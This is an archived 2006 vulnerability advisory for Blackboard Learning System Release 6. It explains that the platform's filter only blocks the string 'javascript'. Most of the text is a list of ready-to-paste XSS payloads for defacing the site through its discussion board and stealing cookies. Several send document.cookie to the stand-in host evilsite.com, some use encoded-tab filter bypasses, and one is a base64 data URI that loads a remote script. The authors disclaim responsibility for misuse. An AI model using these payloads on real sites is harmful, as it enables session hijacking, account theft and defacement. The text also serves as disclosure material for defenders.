blsXSS.txt

blsXSS.txt: Posted Aug 27, 2006; Authored by PrOtOn, digi7al64; Blackboard Learning System release 6 suffers from a multitude of cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | b3e98ad32f7e9dcdbac019cbb91d5660eafdc9cf66ed34ec23b24b6cfeb29c5b; Download | Favorite | View

blsXSS.txt

-----------------------------------------------------------------------------------------

Found by: PrOtOn & digi7al64

Date: May 20th 2006

Critical Level: High

Type: Multiple Cross Site Scripting (XSS) vunerabilities


------------------------------------------------------------------------------------------


Software:
Blackboard Learning System (Release 6) Blackboard Learning and Community Portal Suite (Release6)-6.2.3.23


------------------------------------------------------------------------------------------


Explanation: You can inject HTML, VB code and or Javascript into specific tags to steal 
cookies, deface the site using frame busters or even redirect to external sites for phishing purposes. 
If you have limited access, then a simple post into the Discussion Board using the right 
tags with the right code (provided below) will execute the vulnerability(ies).


-------------------------------------------------------------------------------------------

About:
Blackboards parsing system only checks for the string "javascript", Thus vbscript code can be injected at will into tags as well as any versions of javascript that uses uncommon syntax (ie tabs encoding etc)

-------------------------------------------------------------------------------------------
Vulnerabilities:

Defacement (FrameBuster)
-------------------------
<meta http-equiv="refresh"
content="15;url= http://evilsite.com">


Defacement (FrameBuster)
-------------------------
<iframe src=" http://evilsite.com" width=100
height=100></iframe>


Defacement (IE ONLY)
-------------------------
<img src=vbscript:document.write("defaced_by_insane_script_kiddies")>


Defacement (IE ONLY)
-------------------------
<link rel="stylesheet"
href=vbscript:document.write("defaced_by_insane_script_kiddies")>

<img src=vb script:document.write("defaced_by_insane_script_kiddies")>


Cookie Stealer (IE ONLY)
-------------------------

<img
src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/>
<img src="vbscript:window.focus ()"style=visibility:hidden/>
<img src="vbscript: window.close()"style=visibility:hidden/>


Cookie Stealer (IE ONLY)
-------------------------
<link rel="stylesheet"
href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">


Cookie Stealer (Encoded Tab - IE ONLY)
-------------------------
<img
src="jav&#x09;ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (html encoded - IE ONLY)
-------------------------
<img
src='javascripdocument.images[1].s
rc=" http://evilsite.com"+document.cookie;'<img
src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (tabs - IE ONLY)
-------------------------
<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (body tag with tabs - IE ONLY)
-------------------------
<body background="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">


Cookie Stealer (div tag with tabs - IE ONLY)
-------------------------
<div style="background-image: url(jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)">


Cookie Stealer (firefox)
-------------------------
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">


Cookie Stealer (firefox - click to work)
-------------------------
<a
href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>  


---------------------------------------------------------------------------------------------


Disclaimer:
Myself or any other person involved with this discovery will not be responsible for what you 
do with this information.
Blackboard developers have been contacted by me and a patch has been released according to them.


-----------------------------------------------------------------------------------------------


Shout Outs:
r0xes, criticalsecurity(dot)net, Infowar(dot)com


------------------------------------------------------------------------------------------------


Contact:
Pr070n(at)gmail(dot)com
Digi7al64(at)gmail(dot)com


-------------------------------------------------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 275 files
indoushka 177 files
Jay Turla 150 files
Ubuntu 77 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,327)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,893)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,867)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

blsXSS.txt

blsXSS.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

blsXSS.txt

Share This

blsXSS.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems